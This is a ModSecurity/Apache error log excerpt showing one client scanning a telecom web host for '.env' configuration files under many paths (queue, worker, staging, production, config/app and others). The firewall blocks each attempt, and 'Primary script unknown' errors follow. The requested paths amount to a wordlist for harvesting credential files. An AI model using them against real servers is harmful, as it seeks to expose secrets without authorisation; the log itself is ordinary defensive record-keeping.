[Mon May 11 17:23:08.275421 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/kafka/.env"] [unique_id "agH0XA-Qm4vhlWBPlMjN_gAAAAI"]
[Mon May 11 17:23:08.429844 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /queue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/queue/.env"] [unique_id "agH0XA-Qm4vhlWBPlMjN_wAAAAI"]
[Mon May 11 17:23:08.430345 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/queue/.env"] [unique_id "agH0XA-Qm4vhlWBPlMjN_wAAAAI"]
[Mon May 11 17:23:08.430570 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/queue/.env"] [unique_id "agH0XA-Qm4vhlWBPlMjN_wAAAAI"]
[Mon May 11 17:23:08.586747 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /worker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/worker/.env"] [unique_id "agH0XA-Qm4vhlWBPlMjOAAAAAAI"]
[Mon May 11 17:23:08.587254 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/worker/.env"] [unique_id "agH0XA-Qm4vhlWBPlMjOAAAAAAI"]
[Mon May 11 17:23:08.587527 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/worker/.env"] [unique_id "agH0XA-Qm4vhlWBPlMjOAAAAAAI"]
[Mon May 11 17:23:08.741963 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /job/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/job/.env"] [unique_id "agH0XA-Qm4vhlWBPlMjOAQAAAAI"]
[Mon May 11 17:23:08.742472 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/job/.env"] [unique_id "agH0XA-Qm4vhlWBPlMjOAQAAAAI"]
[Mon May 11 17:23:08.742752 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/job/.env"] [unique_id "agH0XA-Qm4vhlWBPlMjOAQAAAAI"]
[Mon May 11 17:23:08.896792 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/test/.env"] [unique_id "agH0XA-Qm4vhlWBPlMjOAgAAAAI"]
[Mon May 11 17:23:08.897294 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/test/.env"] [unique_id "agH0XA-Qm4vhlWBPlMjOAgAAAAI"]
[Mon May 11 17:23:08.897554 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/test/.env"] [unique_id "agH0XA-Qm4vhlWBPlMjOAgAAAAI"]
[Mon May 11 17:23:09.052037 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/qa/.env"] [unique_id "agH0XQ-Qm4vhlWBPlMjOAwAAAAI"]
[Mon May 11 17:23:09.052535 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/qa/.env"] [unique_id "agH0XQ-Qm4vhlWBPlMjOAwAAAAI"]
[Mon May 11 17:23:09.052795 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/qa/.env"] [unique_id "agH0XQ-Qm4vhlWBPlMjOAwAAAAI"]
[Mon May 11 17:23:09.527246 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /preview/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/preview/.env"] [unique_id "agH0XQ-Qm4vhlWBPlMjOBAAAAAk"]
[Mon May 11 17:23:09.527742 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/preview/.env"] [unique_id "agH0XQ-Qm4vhlWBPlMjOBAAAAAk"]
[Mon May 11 17:23:09.527970 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/preview/.env"] [unique_id "agH0XQ-Qm4vhlWBPlMjOBAAAAAk"]
[Mon May 11 17:23:09.689656 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/beta/.env"] [unique_id "agH0XQ-Qm4vhlWBPlMjOBQAAAAk"]
[Mon May 11 17:23:09.690128 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/beta/.env"] [unique_id "agH0XQ-Qm4vhlWBPlMjOBQAAAAk"]
[Mon May 11 17:23:09.690362 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/beta/.env"] [unique_id "agH0XQ-Qm4vhlWBPlMjOBQAAAAk"]
[Mon May 11 17:23:09.849146 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uat/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/uat/.env"] [unique_id "agH0XQ-Qm4vhlWBPlMjOBgAAAAk"]
[Mon May 11 17:23:09.849638 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/uat/.env"] [unique_id "agH0XQ-Qm4vhlWBPlMjOBgAAAAk"]
[Mon May 11 17:23:09.849854 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/uat/.env"] [unique_id "agH0XQ-Qm4vhlWBPlMjOBgAAAAk"]
[Mon May 11 17:23:10.009219 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/stage/.env"] [unique_id "agH0Xg-Qm4vhlWBPlMjOBwAAAAk"]
[Mon May 11 17:23:10.009666 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/stage/.env"] [unique_id "agH0Xg-Qm4vhlWBPlMjOBwAAAAk"]
[Mon May 11 17:23:10.009883 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/stage/.env"] [unique_id "agH0Xg-Qm4vhlWBPlMjOBwAAAAk"]
[Mon May 11 17:23:10.168446 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/development/.env"] [unique_id "agH0Xg-Qm4vhlWBPlMjOCAAAAAk"]
[Mon May 11 17:23:10.168922 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/development/.env"] [unique_id "agH0Xg-Qm4vhlWBPlMjOCAAAAAk"]
[Mon May 11 17:23:10.169140 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/development/.env"] [unique_id "agH0Xg-Qm4vhlWBPlMjOCAAAAAk"]
[Mon May 11 17:23:10.327837 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/production/.env"] [unique_id "agH0Xg-Qm4vhlWBPlMjOCQAAAAk"]
[Mon May 11 17:23:10.328518 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/production/.env"] [unique_id "agH0Xg-Qm4vhlWBPlMjOCQAAAAk"]
[Mon May 11 17:23:10.328811 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/production/.env"] [unique_id "agH0Xg-Qm4vhlWBPlMjOCQAAAAk"]
[Mon May 11 17:23:10.487441 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/config/app/.env"] [unique_id "agH0Xg-Qm4vhlWBPlMjOCgAAAAk"]
[Mon May 11 17:23:10.487911 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/config/app/.env"] [unique_id "agH0Xg-Qm4vhlWBPlMjOCgAAAAk"]
[Mon May 11 17:23:10.488120 2026] [security2:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/config/app/.env"] [unique_id "agH0Xg-Qm4vhlWBPlMjOCgAAAAk"]
[Mon May 11 17:23:10.651062 2026] [proxy_fcgi:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:10.811319 2026] [proxy_fcgi:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:10.974080 2026] [proxy_fcgi:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:11.147935 2026] [proxy_fcgi:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:11.308199 2026] [proxy_fcgi:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:11.468047 2026] [proxy_fcgi:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:11.628222 2026] [proxy_fcgi:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:11.948393 2026] [proxy_fcgi:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:12.108212 2026] [proxy_fcgi:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:13.386391 2026] [proxy_fcgi:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:13.545996 2026] [proxy_fcgi:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:13.705982 2026] [proxy_fcgi:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] AH01071: Got error 'Primary script unknown'
